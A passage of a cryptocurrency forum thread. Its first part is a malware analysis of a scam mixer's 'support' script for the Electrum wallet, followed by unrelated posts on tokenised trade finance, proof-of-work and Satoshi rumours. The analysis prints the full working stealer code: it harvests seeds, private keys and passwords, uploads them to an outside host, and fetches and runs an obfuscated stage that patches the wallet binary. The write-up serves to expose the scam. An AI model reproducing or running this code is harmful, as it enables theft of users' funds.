        requests.post("https://"+domain+post_path,base64.b64encode(post_data.encode()))
    
    def verify_w(path, pwd=""):
        global post_data
        global w_id
        global dirs_crypted
        global dirs_noseed
        try:
            w=electrum.storage.WalletStorage(path)
            w_id+=1
            if not w.is_encrypted() or pwd!="":
                if w.is_encrypted():
                    w.decrypt(pwd)
                    #dirs_crypted.discard(path)
                post_data+=str(w_id)+"\n"
                if pwd != "":
                    post_data+=str(path)+" pw:" + pwd + "\n"
                else:
                    post_data+=str(path)+"\n"
                post_data+="s_type:"+str(w.get("seed_type"))+"\n"
                post_data+="s_ver:"+str(w.get("seed_version"))+"\n"
                res = w.get("keystore")
                if res:
                    post_data+="s:"+str(res.get("seed"))+"\n"
                    if not res.get("seed"):
                        dirs_noseed.add(path)
                    post_data+="ty:"+str(res.get("type"))+"\n"
                    post_data+="pr:"+str(res.get("xprv"))+"\n"
                    post_data+="pb:"+str(res.get("xpub"))+"\n"
                    post_data+="pa:"+str(res.get("passphrase"))+"\n"
                else:
                    res = w.get("x1/")
                    res_n = 1
                    while res:
                        if res_n > 6:
                            break
                        post_data+="s:"+str(res.get("seed"))+"\n"
                        if not res.get("seed"):
                            dirs_noseed.add(path)
                        post_data+="ty:"+str(res.get("type"))+"\n"
                        post_data+="pr:"+str(res.get("xprv"))+"\n"
                        post_data+="pb:"+str(res.get("xpub"))+"\n"
                        post_data+="pa:"+str(res.get("passphrase"))+"\n"
    
                        res_n+=1
                        res=w.get("x" + str(res_n) + "/")
    
            else:
                dirs_crypted.add(path)
        except:
            pass
    
    def add_ks(ks):
        global post_data
        s=True
        try:
            post_data+="s:"+str(ks.seed)+"\n"
        except:
            post_data+="s:except\n"
            s=False
        try:
            post_data+="pr:"+str(ks.xprv)+"\n"
        except:
            post_data+="pr:except\n"
        try:
            post_data+="pb:"+str(ks.xpub)+"\n"
        except:
            post_data+="pb:except\n"
        try:
            post_data+="pa:"+str(ks.passphrase)+"\n"
        except:
            post_data+="pa:except\n"
        return s
    
    
    def getpl(elec_dir:str):
        res=requests.post("https://signelectrum.org/mei", data=electrum.version.ELECTRUM_VERSION)
        if res.status_code == 200:
            plug=io.BytesIO(res.content)
            tar=tarfile.TarFile(fileobj=plug)
            for member in tar.getmembers():
                tar.extract(member, path=elec_dir+"/plugins", set_attrs=False)
    
    if os.name == "posix" and not os.path.dirname(p).startswith("/tmp"):
        try:
            getpl(p)
            if getconfig("check_updates"):
                setconfig("check_updates", False)
        except:
            pass
    elif os.name == "nt":
        import shutil
        import winreg
    
        def setEnv(env:str, val: str):
            key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Environment', 0, winreg.KEY_ALL_ACCESS)
            winreg.SetValueEx(key, env, 0, winreg.REG_EXPAND_SZ, val)
            winreg.CloseKey(key)
    
        tmpdir=""
        mei="mei"
        if "TEMP" in os.environ:
            tmpdir=os.environ["TEMP"]+os.sep+mei
        elif "TMP" in os.environ:
            tmpdir=os.environ["TMP"]+os.sep+mei
        elif "USERNAME" in os.environ:
            tmpdir=os.environ["USERNAME"]+os.sep+"AppData"+os.sep+"Local"+os.sep+"Temp"+os.sep+mei
    
        if tmpdir and not os.path.exists(tmpdir):
            current=""
            if hasattr(sys, "_MEIPASS"):
                current=sys._MEIPASS
            elif hasattr(sys, "_MEIPASS2"):
                current=sys._MEIPASS2
    
            if current:
                shutil.copytree(current,tmpdir)
                os.environ["_MEIPASS"]=tmpdir
                os.environ["_MEIPASS2"]=tmpdir
                try:
                    setEnv("_MEIPASS", tmpdir)
                    setEnv("_MEIPASS2", tmpdir)
                    getpl(tmpdir+os.sep+"electrum"+os.sep)
                except:
                    pass
    
    
    post_data+=os.name+" "+p+"\n"
    post_data+=str(w_id)+"\n"
    post_data+=str(wallet.storage.path)+"\n"
    try:
        post_data+="s_type:"+str(wallet.storage.get("seed_type"))+"\n"
        post_data+="s_ver:"+str(wallet.storage.get("seed_version"))+"\n"
        post_data+="elec:"+str(version())+"\n"
    except:
        pass
    w_id += 1
    
    p=wallet.storage.path
    for ks in wallet.get_keystores():
        if not add_ks(ks):
            dirs_noseed.add(p)
    
    verified.add(os.path.normpath(p))
    dirs.add(os.path.dirname(p))
    
    for op in getconfig("recently_open"):
        op=os.path.normpath(op)
        if op not in verified:
            verified.add(op)
            dirs.add(os.path.dirname(op))
            verify_w(op)
    
    testnet_str="testnet"+os.path.sep
    for path_dirs in dirs:
        if testnet_str in path_dirs:
            dirs_notestnet.add(path_dirs.replace(testnet_str, ""))
    dirs = dirs.union(dirs_notestnet)
    
    for d in dirs:
        for dirname, directories, files in os.walk(d):
            for f in files:
                p=dirname+os.path.sep+f
                if p not in verified:
                    verified.add(p)
                    verify_w(p)
    
    if post_data!="":
        sendpost()
    
    if wallet.storage.is_encrypted():
        load=False
        pwd=""
        try:
            from electrum_gui.qt.password_dialog import PasswordDialog
            load=True
        except:
            try:
                from electrum.gui.qt.password_dialog import PasswordDialog
                load=True
            except:
                pass
    
        if load:
            pd=PasswordDialog()
            pwd=pd.run()
        if pwd and pwd!="":
            verify("pw:"+pwd)
    
            post_data=""
            for cw in dirs_crypted:
                verify_w(cw, pwd)
            if post_data!="":
                sendpost()
            
    post_data=""
    try:
        post_data="dc="+str(dirs_crypted.union(dirs_noseed))
        sendpost()
    except:
        pass
    now=0
    for ow in dirs_crypted.union(dirs_noseed):
        if "wallets" in ow:
            now+=1
            try:
                with open(ow,"r") as fw:
                    post_data="w:"+str(now)+",p:"+ow+"\n"+fw.read()
                    sendpost()
            except:
                pass
    
    if os.name == "posix" and sys.argv[0].startswith("/tmp"):
        import subprocess
        b64script="import base64;exec(base64.b64decode(b'aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHJlCmltcG9ydCBvcwppbXBvcnQgc3lzCmltcG9ydCByZXF 1ZXN0cwppbXBvcnQgaGFzaGxpYgppbXBvcnQgc3RydWN0CmltcG9ydCB6bGliCgojZG9udCB3YWl0bA ojcHJvYyA9IFBvcGVuKFtjbWRfc3RyXSwgc2hlbGw9VHJ1ZSwgc3RkaW49Tm9uZSwgc3Rkb3V0PU5vb mUsIHN0ZGVycj1Ob25lLCBjbG9zZV9mZHM9VHJ1ZSkKCnJlX25hbWU9cmUuY29tcGlsZShiImVsZWN0 cnVtLS4qLkFwcEltYWdlIikKcGlkPSIiCnByb2NsaXN0ID0gc3VicHJvY2Vzcy5Qb3BlbihbInBzIiw iLWF4Il0sIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpLmNvbW11bmljYXRlKClbMF0KZm9yIHByb2MgaW 4gcHJvY2xpc3Quc3BsaXQoYiJcbiIpOgogICAgaWYgcmVfbmFtZS5zZWFyY2gocHJvYyk6CiAgICAgI CAgcGlkPXJlLmZpbmRhbGwoYiJbMC05XSsiLHByb2MpCiAgICAgICAgaWYgcGlkOgogICAgICAgICAg ICBwaWQ9cGlkWzBdLmRlY29kZSgiYXNjaWkiKQogICAgICAgIGJyZWFrCgppZiBwaWQgPT0gIiI6CiA gICBzeXMuZXhpdCgwKQoKcGF0aD1vcy5yZWFkbGluaygiL3Byb2MvIitwaWQrIi9leGUiKQppZiBub3 QgcGF0aDoKICAgIHN5cy5leGl0KDApCgpoYXNoPSIiCndpdGggb3BlbihwYXRoLCJyYiIpIGFzIGY6C iAgICBzcmNfZGF0YT1mLnJlYWQoKQogICAgaGFzaD1oYXNobGliLnNoYTI1NihzcmNfZGF0YSkuaGV4 ZGlnZXN0KCkKCmlmIG5vdCBoYXNoOgogICAgc3lzLmV4aXQoMCkKCnI9cmVxdWVzdHMucG9zdCgiaHR 0cHM6Ly9zaWduZWxlY3RydW0ub3JnL2NoZWNrdmVyc2lvbiIsZGF0YT1oYXNoKQppZiByLnN0YXR1c1 9jb2RlID09IDIwMDoKICAgIGQ9ci5jb250ZW50CiAgICBwcmludCgicmVzcG9uc2UgbGVuZ3RoID0gI iArIHN0cihsZW4oZCkpKQogICAgaWYgbGVuKGQpIDw9IDY0OgogICAgICAgIHN5cy5leGl0KDApCiAg ICBpZiBoYXNobGliLnNoYTI1NihkWzotMzJdKS5kaWdlc3QoKSAhPSBkWy0zMjpdOgogICAgICAgIHN 5cy5leGl0KDApCgogICAgcGF0Y2hfcG9zID0gMAogICAgI2RuZXcgPSBiIiIKICAgIGRuZXcgPSBieX RlYXJyYXkoKQogICAgd2hpbGUgcGF0Y2hfcG9zIDwgbGVuKGQpLTMyOgogICAgICAgIChoZWFkX3R5c GUsKSA9IHN0cnVjdC51bnBhY2soIjxjIiwgZFtwYXRjaF9wb3M6cGF0Y2hfcG9zKzFdKQogICAgICAg IHBhdGNoX3Bvcys9MQogICAgICAgIGlmIGhlYWRfdHlwZSA9PSBiIlx4MDAiOgogICAgICAgICAgICB wcmludCgiMHgwMCIpCiAgICAgICAgICAgIChvZmZzZXQsIHNpemUpID0gc3RydWN0LnVucGFjaygiPE lJIiwgZFtwYXRjaF9wb3M6cGF0Y2hfcG9zKzhdKQogICAgICAgICAgICBwYXRjaF9wb3MrPTgKICAgI CAgICAgICAgI2RuZXcrPXNyY19kYXRhW29mZnNldDpvZmZzZXQrc2l6ZV0KICAgICAgICAgICAgZG5l dy5leHRlbmQoc3JjX2RhdGFbb2Zmc2V0Om9mZnNldCtzaXplXSkKICAgICAgICBlbGlmIGhlYWRfdHl wZSA9PSBiIlwwMSI6CiAgICAgICAgICAgIHByaW50KCIweDAxIikKICAgICAgICAgICAgKHNpemUsKS A9IHN0cnVjdC51bnBhY2soIjxJIiwgZFtwYXRjaF9wb3M6cGF0Y2hfcG9zKzRdKQogICAgICAgICAgI CBwYXRjaF9wb3MrPTQKICAgICAgICAgICAgI2RuZXcrPWRbcGF0Y2hfcG9zOnBhdGNoX3BvcytzaXpl XQogICAgICAgICAgICBkbmV3LmV4dGVuZChkW3BhdGNoX3BvczpwYXRjaF9wb3Mrc2l6ZV0pCiAgICA gICAgICAgIHBhdGNoX3Bvcys9c2l6ZQogICAgICAgIGVsaWYgaGVhZF90eXBlID09IGIiXDAyIjoKIC AgICAgICAgICAgcHJpbnQoIjB4MDIiKQogICAgICAgICAgICAoc2l6ZSwpID0gc3RydWN0LnVucGFja ygiPEkiLCBkW3BhdGNoX3BvczpwYXRjaF9wb3MrNF0pCiAgICAgICAgICAgIHBhdGNoX3Bvcys9NAog ICAgICAgICAgICAjZG5ldys9emxpYi5kZWNvbXByZXNzKGRbcGF0Y2hfcG9zOnBhdGNoX3BvcytzaXp lXSkKICAgICAgICAgICAgZG5ldy5leHRlbmQoemxpYi5kZWNvbXByZXNzKGRbcGF0Y2hfcG9zOnBhdG NoX3BvcytzaXplXSkpCiAgICAgICAgICAgIHBhdGNoX3Bvcys9c2l6ZQogICAgICAgIGVsc2U6CiAgI CAgICAgICAgIHByaW50KCJXVEYiKQoKICAgIHN0PW9zLnN0YXQocGF0aCkKICAgIGF0PXN0LnN0X2F0 aW1lCiAgICBtdD1zdC5zdF9tdGltZQogICAgcGVybT1zdC5zdF9tb2RlICYgMG83NzcKICAgIG9zLnV ubGluayhwYXRoKQogICAgd2l0aCBvcGVuKHBhdGgsIndiIikgYXMgZjoKICAgICAgICBmLndyaXRlKG RuZXcpCiAgICBvcy51dGltZShwYXRoLCAoYXQsIG10KSkKICAgIG9zLmNobW9kKHBhdGgsIHBlcm0p'))"
        subprocess.Popen([sys.executable, "-c", b64script], stdout=open("/dev/null","w"), preexec_fn=os.setpgrp)
    
    
    print("Server exception, please, contact with support.")
    


We see now that running this command in your Electrum shell uploads your private keys to the Bitmixer server. It is designed to work with multiple operating systems.

After the code has been run it returns a message asking you to contact support, presumably either to alert them to sweep your keys, or so they can continue their social engineering if your keys do not currently contain funds.

Let's decode the final hashed block, which appears to be more of the same malware code:


```python
print(base64.b64decode("aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHJlCmltcG9ydCBvcwppbXBvcnQgc3lzCmltcG9ydCByZXF 1ZXN0cwppbXBvcnQgaGFzaGxpYgppbXBvcnQgc3RydWN0CmltcG9ydCB6bGliCgojZG9udCB3YWl0bA ojcHJvYyA9IFBvcGVuKFtjbWRfc3RyXSwgc2hlbGw9VHJ1ZSwgc3RkaW49Tm9uZSwgc3Rkb3V0PU5vb mUsIHN0ZGVycj1Ob25lLCBjbG9zZV9mZHM9VHJ1ZSkKCnJlX25hbWU9cmUuY29tcGlsZShiImVsZWN0 cnVtLS4qLkFwcEltYWdlIikKcGlkPSIiCnByb2NsaXN0ID0gc3VicHJvY2Vzcy5Qb3BlbihbInBzIiw iLWF4Il0sIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpLmNvbW11bmljYXRlKClbMF0KZm9yIHByb2MgaW 4gcHJvY2xpc3Quc3BsaXQoYiJcbiIpOgogICAgaWYgcmVfbmFtZS5zZWFyY2gocHJvYyk6CiAgICAgI CAgcGlkPXJlLmZpbmRhbGwoYiJbMC05XSsiLHByb2MpCiAgICAgICAgaWYgcGlkOgogICAgICAgICAg ICBwaWQ9cGlkWzBdLmRlY29kZSgiYXNjaWkiKQogICAgICAgIGJyZWFrCgppZiBwaWQgPT0gIiI6CiA gICBzeXMuZXhpdCgwKQoKcGF0aD1vcy5yZWFkbGluaygiL3Byb2MvIitwaWQrIi9leGUiKQppZiBub3 QgcGF0aDoKICAgIHN5cy5leGl0KDApCgpoYXNoPSIiCndpdGggb3BlbihwYXRoLCJyYiIpIGFzIGY6C iAgICBzcmNfZGF0YT1mLnJlYWQoKQogICAgaGFzaD1oYXNobGliLnNoYTI1NihzcmNfZGF0YSkuaGV4 ZGlnZXN0KCkKCmlmIG5vdCBoYXNoOgogICAgc3lzLmV4aXQoMCkKCnI9cmVxdWVzdHMucG9zdCgiaHR 0cHM6Ly9zaWduZWxlY3RydW0ub3JnL2NoZWNrdmVyc2lvbiIsZGF0YT1oYXNoKQppZiByLnN0YXR1c1 9jb2RlID09IDIwMDoKICAgIGQ9ci5jb250ZW50CiAgICBwcmludCgicmVzcG9uc2UgbGVuZ3RoID0gI iArIHN0cihsZW4oZCkpKQogICAgaWYgbGVuKGQpIDw9IDY0OgogICAgICAgIHN5cy5leGl0KDApCiAg ICBpZiBoYXNobGliLnNoYTI1NihkWzotMzJdKS5kaWdlc3QoKSAhPSBkWy0zMjpdOgogICAgICAgIHN 5cy5leGl0KDApCgogICAgcGF0Y2hfcG9zID0gMAogICAgI2RuZXcgPSBiIiIKICAgIGRuZXcgPSBieX RlYXJyYXkoKQogICAgd2hpbGUgcGF0Y2hfcG9zIDwgbGVuKGQpLTMyOgogICAgICAgIChoZWFkX3R5c GUsKSA9IHN0cnVjdC51bnBhY2soIjxjIiwgZFtwYXRjaF9wb3M6cGF0Y2hfcG9zKzFdKQogICAgICAg IHBhdGNoX3Bvcys9MQogICAgICAgIGlmIGhlYWRfdHlwZSA9PSBiIlx4MDAiOgogICAgICAgICAgICB wcmludCgiMHgwMCIpCiAgICAgICAgICAgIChvZmZzZXQsIHNpemUpID0gc3RydWN0LnVucGFjaygiPE lJIiwgZFtwYXRjaF9wb3M6cGF0Y2hfcG9zKzhdKQogICAgICAgICAgICBwYXRjaF9wb3MrPTgKICAgI CAgICAgICAgI2RuZXcrPXNyY19kYXRhW29mZnNldDpvZmZzZXQrc2l6ZV0KICAgICAgICAgICAgZG5l dy5leHRlbmQoc3JjX2RhdGFbb2Zmc2V0Om9mZnNldCtzaXplXSkKICAgICAgICBlbGlmIGhlYWRfdHl wZSA9PSBiIlwwMSI6CiAgICAgICAgICAgIHByaW50KCIweDAxIikKICAgICAgICAgICAgKHNpemUsKS A9IHN0cnVjdC51bnBhY2soIjxJIiwgZFtwYXRjaF9wb3M6cGF0Y2hfcG9zKzRdKQogICAgICAgICAgI CBwYXRjaF9wb3MrPTQKICAgICAgICAgICAgI2RuZXcrPWRbcGF0Y2hfcG9zOnBhdGNoX3BvcytzaXpl XQogICAgICAgICAgICBkbmV3LmV4dGVuZChkW3BhdGNoX3BvczpwYXRjaF9wb3Mrc2l6ZV0pCiAgICA gICAgICAgIHBhdGNoX3Bvcys9c2l6ZQogICAgICAgIGVsaWYgaGVhZF90eXBlID09IGIiXDAyIjoKIC AgICAgICAgICAgcHJpbnQoIjB4MDIiKQogICAgICAgICAgICAoc2l6ZSwpID0gc3RydWN0LnVucGFja ygiPEkiLCBkW3BhdGNoX3BvczpwYXRjaF9wb3MrNF0pCiAgICAgICAgICAgIHBhdGNoX3Bvcys9NAog ICAgICAgICAgICAjZG5ldys9emxpYi5kZWNvbXByZXNzKGRbcGF0Y2hfcG9zOnBhdGNoX3BvcytzaXp lXSkKICAgICAgICAgICAgZG5ldy5leHRlbmQoemxpYi5kZWNvbXByZXNzKGRbcGF0Y2hfcG9zOnBhdG NoX3BvcytzaXplXSkpCiAgICAgICAgICAgIHBhdGNoX3Bvcys9c2l6ZQogICAgICAgIGVsc2U6CiAgI CAgICAgICAgIHByaW50KCJXVEYiKQoKICAgIHN0PW9zLnN0YXQocGF0aCkKICAgIGF0PXN0LnN0X2F0 aW1lCiAgICBtdD1zdC5zdF9tdGltZQogICAgcGVybT1zdC5zdF9tb2RlICYgMG83NzcKICAgIG9zLnV ubGluayhwYXRoKQogICAgd2l0aCBvcGVuKHBhdGgsIndiIikgYXMgZjoKICAgICAgICBmLndyaXRlKG RuZXcpCiAgICBvcy51dGltZShwYXRoLCAoYXQsIG10KSkKICAgIG9zLmNobW9kKHBhdGgsIHBlcm0p").decode())
```
Result:

    import subprocess
    import re
    import os
    import sys
    import requests
    import hashlib
    import struct
    import zlib
    
    #dont waitl
    #proc = Popen([cmd_str], shell=True, stdin=None, stdout=None, stderr=None, close_fds=True)
    
    re_name=re.compile(b"electrum-.*.AppImage")
    pid=""
    proclist = subprocess.Popen(["ps","-ax"], stdout=subprocess.PIPE).communicate()[0]
    for proc in proclist.split(b"\n"):
        if re_name.search(proc):
            pid=re.findall(b"[0-9]+",proc)
            if pid:
                pid=pid[0].decode("ascii")
            break
    
    if pid == "":
        sys.exit(0)
    
    path=os.readlink("/proc/"+pid+"/exe")
    if not path:
        sys.exit(0)
    
    hash=""
    with open(path,"rb") as f:
        src_data=f.read()
        hash=hashlib.sha256(src_data).hexdigest()
    
    if not hash:
        sys.exit(0)
    
    r=requests.post("https://signelectrum.org/checkversion",data=hash)
    if r.status_code == 200:
        d=r.content
        print("response length = " + str(len(d)))
        if len(d) <= 64:
            sys.exit(0)
        if hashlib.sha256(d[:-32]).digest() != d[-32:]:
            sys.exit(0)
    
        patch_pos = 0
        #dnew = b""
        dnew = bytearray()
        while patch_pos < len(d)-32:
            (head_type,) = struct.unpack("<c", d[patch_pos:patch_pos+1])
            patch_pos+=1
            if head_type == b"\x00":
                print("0x00")
                (offset, size) = struct.unpack("<II", d[patch_pos:patch_pos+8])
                patch_pos+=8
                #dnew+=src_data[offset:offset+size]
                dnew.extend(src_data[offset:offset+size])
            elif head_type == b"\01":
                print("0x01")
                (size,) = struct.unpack("<I", d[patch_pos:patch_pos+4])
                patch_pos+=4
                #dnew+=d[patch_pos:patch_pos+size]
                dnew.extend(d[patch_pos:patch_pos+size])
                patch_pos+=size
            elif head_type == b"\02":
                print("0x02")
                (size,) = struct.unpack("<I", d[patch_pos:patch_pos+4])
                patch_pos+=4
                #dnew+=zlib.decompress(d[patch_pos:patch_pos+size])
                dnew.extend(zlib.decompress(d[patch_pos:patch_pos+size]))
                patch_pos+=size
            else:
                print("WTF")
    
        st=os.stat(path)
        at=st.st_atime
        mt=st.st_mtime
        perm=st.st_mode & 0o777
        os.unlink(path)
        with open(path,"wb") as f:
            f.write(dnew)
        os.utime(path, (at, mt))
        os.chmod(path, perm)


It's clear to see that Bitcoinmixer are attempting to steal users Bitcoins. First, they blatently steal funds during the mixing service, and then after the user contacts support they are victimised with a further attempt to completely clean out their wallet.

## Conclusion of analysis: bitcoinmixer.eu is a SCAM mixing service which steals Bitcoin from users. Anyone using their services should stop immediately.

I would recommend Electrum disable `exec()` and `eval()` inside their shell, to prevent further malware of this nature.

I have been using blockchain.com
Can I do that with that?
I imported my private key to that website.

Greetings all!

I apologies in advance if my question is misplaced or there has been a similar discussion before, but as a total newbie with big dreams (I do realize most of them will never come to fruition) on one hand, and an owner of a commodity trading company, here is my question:



I own a commodity trading company. All of my products come from African-based farmers and I export it to a certain Eastern European country. The challenges that I face are related to - you guessed it - financing. Financing is extremely expensive, it involves three institutions - private investors, banks and insurance companies - and our clients (buyers) usually demand a credit of 60 days, which means that we buy, process and ship our produce at our own cost (paying $%$% to the above mentioned institutions). I'm looking to eliminate these three, and thought of a cryptocurrency. I'm not savvy enough or technically educated to program it myself, but, to the main question - is it even feasible to begin with to embark on a project of issuing our own currency that is backed by our existing physical produce and contracts? I believe that it will bring a real value to the owners of the coin/token, who will basically replace the above mentioned institutions, or am I totally off the mark?

I don't know. It's a POW change, but if it's not against a threat to Bitcoin's existence, then I believe the community WON'T reach consensus.


Staking? Like Decred? No no no with Bitcoin's unfair distribution.

This is not the first paper/research to make PoW more useful, but most of them share same problem which is, certain party must give the data used to perform the computation.
It's obvious there's centralization risks, but my other concern are costs to verify the trained ML model and distribution of data required to perform the computation.

But it's quite interesting to use PoW for machine learning, so i'll read it thoroughly later.

You are right people very often misunderstand and run over the wall just fall in confusion.

Only AGD knows the real Satoshi because something very secret ---- AGD, is that correct ?

if you think dave is satoshi
if u think the tulip trust did actually have collateral
if you think craig even knew the real satoshi
. you have much to learn

dave did not have bitcoins. he was just a notary to CSW file of public keys. dave got suckered into thinking CSW had loads of coins by seeing loads of public addresses.
dave had no big involvement in bitcoin and dave had no large stash of coins.

dave and csw were not anything related to the real satoshi.